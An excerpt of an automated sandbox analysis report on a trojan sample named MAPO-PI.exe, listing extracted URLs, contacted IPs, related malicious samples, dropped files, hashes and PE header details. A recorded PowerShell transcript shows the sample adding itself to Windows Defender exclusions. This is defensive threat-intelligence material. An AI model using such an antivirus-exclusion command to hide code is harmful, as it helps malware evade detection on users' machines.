                      • Avira URL Cloud: safe
                      		unknown
                      https://yoast.com/wordpress/plugins/seo/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        		high
                        http://www.diofis.com/wp-includes/wlwmanifest.xmlcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/blog/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/kahvaltilik-tarifler/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/hizmetlerimiz/hastaliklarda-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/wp-content/themes/neve/style.min.css?ver=2.8.3cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/hizmetlerimiz/bireysel-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/saglikli-ve-pratik-roka-salatasi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/#logocmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/#organizationcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/11/19/aspir-yagi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/maydanoz-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/category/guncel-diyet-meseleleri/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.collada.org/2005/11/COLLADASchema9DoneMAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.diofis.com/wp-content/uploads/2020/09/cropped-cropped-diofis-logo-2-3.pngcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/elma-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/11/01/cikolatali-toplar/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/hizmetlerimiz/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/11/01/cennet-tatlisi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/wp-json/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diofis.com/2020/10/24/portakalli-meyve-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMAPO-PI.exe, 00000000.00000002.238302616.00000000025B1000.00000004.00000001.sdmpfalse
                          		high
                          https://m0n.co/gacmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/2020/10/24/odem-cayi-2/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/category/sporcu-beslenmesi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/wp-content/uploads/2020/09/cropped-diofis-logo-2.pngcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/feed/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/hizmetlerimiz/kurumsal-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/category/tarifler/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com?sccss=1&#038;ver=5.5.6cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.diofis.com/2020/10/24/saglikli-ve-pratik-corba-tarifi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.w.org/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            		high
                            http://www.diofis.com/2020/11/01/ketojenik-beslenme/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/comments/feed/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/hizmetlerimiz/cocukluk-cagi-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/2020/10/24/sebze-corbasi-tarifi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.diofis.com/2020/10/24/yulafli-kahvalti/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://schema.orgcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                              		high
                              http://www.diofis.com/2020/10/24/meyve-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://gmpg.org/xfn/11cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                		high
                                http://www.diofis.com/bize-ulasin/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/partnerlerimiz/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/xmlrpc.php?rsdcmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/10/24/saglikli-ve-pratik-salata-tarifi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/?s=cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/10/24/odem-cayi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/wp-includes/css/dist/block-library/style.min.css?ver=5.5.6cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/hizmetlerimiz/kilo-koruma-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/11/27/sporcu-beslenmesinde-yeterli-ve-dengeli-beslenmenin-onemi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/hizmetlerimiz/online-beslenme-danismanligi/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/#websitecmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.diofis.com/2020/10/24/rahatlatici-cay/cmmon32.exe, 00000010.00000002.498749013.000000000565F000.00000004.00020000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public

                                IPDomainCountryFlagASNASN NameMalicious
                                34.102.136.180
                                		lifeinformpodcast.comUnited States
                                		15169GOOGLEUSfalse
                                159.65.10.143
                                		www.transforming-leadership.comUnited States
                                		14061DIGITALOCEAN-ASNUStrue
                                109.232.217.55
                                		diofis.comTurkey
                                		42807AEROTEK-ASTRtrue

                                General Information

                                Joe Sandbox Version:33.0.0 White Diamond
                                Analysis ID:510736
                                Start date:28.10.2021
                                Start time:07:39:13
                                Joe Sandbox Product:CloudBasic
                                Overall analysis duration:0h 9m 33s
                                Hypervisor based Inspection enabled:false
                                Report type:light
                                Sample file name:MAPO-PI.exe
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                Number of analysed new started processes analysed:29
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • HDC enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@10/5@3/3
                                EGA Information:Failed
                                HDC Information:
                                • Successful, ratio: 9% (good quality ratio 8%)
                                • Quality average: 72.1%
                                • Quality standard deviation: 32%
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 0
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Adjust boot time
                                • Enable AMSI
                                • Found application associated with file extension: .exe
                                Warnings:
                                Show All
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                • TCP Packets have been reduced to 100
                                • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.211.6.115, 23.211.4.86, 20.50.102.62, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.82.209.183
                                • Excluded domains from analysis (whitelisted): www.bing.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                07:40:04API Interceptor1x Sleep call for process: MAPO-PI.exe modified
                                07:40:08API Interceptor37x Sleep call for process: powershell.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                DIGITALOCEAN-ASNUSdigital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                • 159.203.83.162
                                digital.alarmclock.alarmy.apkGet hashmaliciousBrowse
                                • 159.203.83.162
                                e6dff8475541ebddc1f0db47a311eb2c25581b7d5e62a.exeGet hashmaliciousBrowse
                                • 206.81.21.194
                                10272021-AM65Application.HTMGet hashmaliciousBrowse
                                • 5.101.110.225
                                v2.exeGet hashmaliciousBrowse
                                • 139.59.30.14
                                gqqrsjn4g8Get hashmaliciousBrowse
                                • 161.35.54.166
                                mdOr6C8jJpGet hashmaliciousBrowse
                                • 161.35.54.166
                                Order.exeGet hashmaliciousBrowse
                                • 138.197.164.163
                                scMacvapQQGet hashmaliciousBrowse
                                • 161.35.54.166
                                3Y8WDTH5lrGet hashmaliciousBrowse
                                • 161.35.54.166
                                9ecqofrtuoGet hashmaliciousBrowse
                                • 161.35.54.166
                                vx69bSxRQaGet hashmaliciousBrowse
                                • 161.35.54.166
                                8Xm9hcPRW9Get hashmaliciousBrowse
                                • 161.35.54.166
                                hVq8pSanzKGet hashmaliciousBrowse
                                • 161.35.54.166
                                t0rtYC582wGet hashmaliciousBrowse
                                • 161.35.54.166
                                JpvnaZB6aUGet hashmaliciousBrowse
                                • 161.35.54.166
                                GBlokuLqdgGet hashmaliciousBrowse
                                • 161.35.54.166
                                DpK5nUwiwE.exeGet hashmaliciousBrowse
                                • 159.89.117.132
                                GU5kmLwV7r.exeGet hashmaliciousBrowse
                                • 157.245.5.40
                                peSZa2MV75.exeGet hashmaliciousBrowse
                                • 157.245.5.40
                                AEROTEK-ASTR2FNlQLySZS.exeGet hashmaliciousBrowse
                                • 94.199.200.61
                                Tips Ref.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                RFQ NO. T01777ENQ-0090F8.exeGet hashmaliciousBrowse
                                • 109.232.217.77
                                PO12031.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                Halkbank_Ekstre_20210726_084931-069855PDF.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                Ziraat Bankas#U0131 Swift Mesaj#U0131.exeGet hashmaliciousBrowse
                                • 37.230.104.41
                                Ehsu0xgexofjfX9.exeGet hashmaliciousBrowse
                                • 178.157.8.3
                                KNm3lXniFj.exeGet hashmaliciousBrowse
                                • 109.232.216.164
                                Halkbank_Ekstre_20210309_080203_744632.PDF.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                doc2019291888001990.pdf.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                kuKyYYYuS0.exeGet hashmaliciousBrowse
                                • 31.207.83.53
                                4zfdibTbxl.exeGet hashmaliciousBrowse
                                • 31.207.83.53
                                W0HuUhFe5Kma3EO.exeGet hashmaliciousBrowse
                                • 178.157.8.3
                                INVOICE 5204.exeGet hashmaliciousBrowse
                                • 31.207.83.53
                                80893_payslip.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                2UZ8zLT94pJEufW.exeGet hashmaliciousBrowse
                                • 178.157.8.3
                                hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                hesaphareketi-01.pdf.exeGet hashmaliciousBrowse
                                • 94.199.200.87
                                Transfer receipt Copy 1038690332210516.exeGet hashmaliciousBrowse
                                • 94.199.200.62
                                60rUtFJPFb.exeGet hashmaliciousBrowse
                                • 94.199.200.203

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MAPO-PI.exe.log
                                Process:C:\Users\user\Desktop\MAPO-PI.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):22216
                                Entropy (8bit):5.605411736270381
                                Encrypted:false
                                SSDEEP:384:itCD3q0uQVhlitckG2mRkSBKn8jultIar7Y9g9SJ3xqT1MaXZlbAV7qWDuZBDI+g:jVr4ckN4K8Clt1v9cQCufwUVW
                                MD5:95B172E74C7587008D47DD07599466DF
                                SHA1:F109393BB49245183CF3EF821B4CF467A99ABB0B
                                SHA-256:9CD70D7F52085B373DD40A8B3B03E568431FBA0DAA51A589D17FCC773438A3FF
                                SHA-512:CAA1486D47A143B23E4731942B6477A338E389EDBD4ABFD49FF7737AC93827BFE384E130E1F04DDEC3CB2D73B7584B77CC1FA952706B65E6389EE08C31A2CE65
                                Malicious:false
                                Reputation:low
                                Preview: @...e...........j.......h...j.^.[.........H..........@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhm0t1yh.nml.psm1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p05gvjwq.ucq.ps1
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:very short file (no magic)
                                Category:dropped
                                Size (bytes):1
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:3:U:U
                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: 1
                                C:\Users\user\Documents\20211028\PowerShell_transcript.855271.6SnYDjtu.20211028074006.txt
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):5707
                                Entropy (8bit):5.381930049255417
                                Encrypted:false
                                SSDEEP:96:BZjS/CN0S3qDo1ZpnRZz/CN0S3qDo1Z+4d+dQdjZW/CN0S3qDo1Zp5dAdAdOZh:fRn
                                MD5:7A5FF84148F6EB95DFAF4DE3120DC911
                                SHA1:D168B38F281F305B45596159FE835682DEE2BF11
                                SHA-256:053633604A80FDB3DFAFFB3D6E2DE3BE2A43F5C21A879683F57B6A74B5069EAA
                                SHA-512:FAD1460ED07176682C12624C401EDF38ED9C068BB0C3BE6C3909526C68E6135EDD04F64C576C79AF8526B1AB922A57566CBC9E10AA63BDCB8BE7D2167D07F43B
                                Malicious:false
                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20211028074007..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 855271 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..Process ID: 2592..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211028074007..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\MAPO-PI.exe..**********************..Windows PowerShell transcript start..Start time: 20211028074325..Username: computer\user..RunAs User: computer\user..Configuration

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):6.69902416121267
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:MAPO-PI.exe
                                File size:532992
                                MD5:c619bbbe3c374c8fd3e9f2c26d087496
                                SHA1:a8f7e80f2c8e7687789f2267935610f81bc773d4
                                SHA256:260b61ddee5133e450110555cf0675ad6c015f51e6053c8fdc169db5e01bf993
                                SHA512:754a8e96edeb6c2dc63a7530c7d791b2852cce2a90ee477de446d9ffd9304e8934a8e7088a34127643804c569cf8d40102e8a2c0867f57d6fa6e39cd9cc6b5a2
                                SSDEEP:6144:CR5D/Qa1Hyw3Q3+3pajySWnMTritfg/784KxvFurGagGlkmOv7:2B/Qa1HyT4ajvSeitfWXKxdaWmI7
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ya..............0......D........... ........@.. ....................................@................................

                                File Icon

                                Icon Hash:31b0b4b6b6b6b031

                                Static PE Info

                                General

                                Entrypoint:0x47fb82
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x6179BDEA [Wed Oct 27 21:00:26 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x7fb300x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x800000x4198.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
